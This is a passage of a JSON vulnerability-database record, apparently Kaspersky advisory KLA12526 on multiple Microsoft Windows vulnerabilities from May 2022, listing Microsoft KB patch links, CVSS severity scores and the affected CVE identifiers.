list*:\n[5014018](<http://support.microsoft.com/kb/5014018>) \n[5014001](<http://support.microsoft.com/kb/5014001>) \n[5013942](<http://support.microsoft.com/kb/5013942>) \n[5013941](<http://support.microsoft.com/kb/5013941>) \n[5014025](<http://support.microsoft.com/kb/5014025>) \n[5013952](<http://support.microsoft.com/kb/5013952>) \n[5013943](<http://support.microsoft.com/kb/5013943>) \n[5013944](<http://support.microsoft.com/kb/5013944>) \n[5014011](<http://support.microsoft.com/kb/5014011>) \n[5013945](<http://support.microsoft.com/kb/5013945>) \n[5014017](<http://support.microsoft.com/kb/5014017>) \n[5013963](<http://support.microsoft.com/kb/5013963>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "kaspersky", "title": "KLA12526 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151"], "modified": "2022-10-18T00:00:00", "id": "KLA12526", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12526/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}